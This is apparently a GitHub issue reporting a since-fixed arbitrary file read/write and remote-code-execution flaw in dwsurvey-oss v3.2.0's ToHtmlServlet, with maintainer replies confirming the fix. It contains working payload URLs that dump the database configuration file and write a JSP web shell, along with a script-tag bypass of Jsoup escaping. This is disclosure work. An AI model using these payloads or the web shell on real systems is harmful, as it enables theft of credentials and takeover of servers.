wkeyuan
commented
2 years ago 版本已经更新,请检查是否还存在
Closed lavon321 closed 2 years ago
wkeyuan
commented
2 years ago 版本已经更新,请检查是否还存在
lavon321
commented
2 years ago 新版本不存在该问题
In the latest version of dwsurvey-oss-v3.2.0, there is a requestdispatcher.forward Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because Requestdispatcher.forward is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB-INF / web.xml, causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload.
Request forwarding exists in the server method in the com/key/common/utils/ToHtmlServlet.java file
Due to the existence of ByteArrayOutputStream, the forwarded response is saved in the byte array buffer in memory
The flushDo function was passed in
Here, it is converted into a string and assigned to the document variable
Pass in printStream function
Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above
payload:
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/classes/conf/application.propertiesThe 1.txt file will be written in the web root directory and then accessedhttp://localhost:8888/diaowen/1.txtSuccessfully read database configuration file:You can also find a file upload place in the background to create rce, create a new questionnaire - > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package
Visit
So the uploaded image file content is:
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.jsp&url=/ueditor/jsp/upload/image/20210815/1629018633885086990.png,the JSP file will be generated in the web root directory Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the'<script> </script>'tag to package payload, can successfully bypass escaped<script><%Runtime.getRuntime().exec(request.getParameter("i"));%></script>Visithttp://localhost:8888/diaowen/1.jsp?i=calc, successfully rce: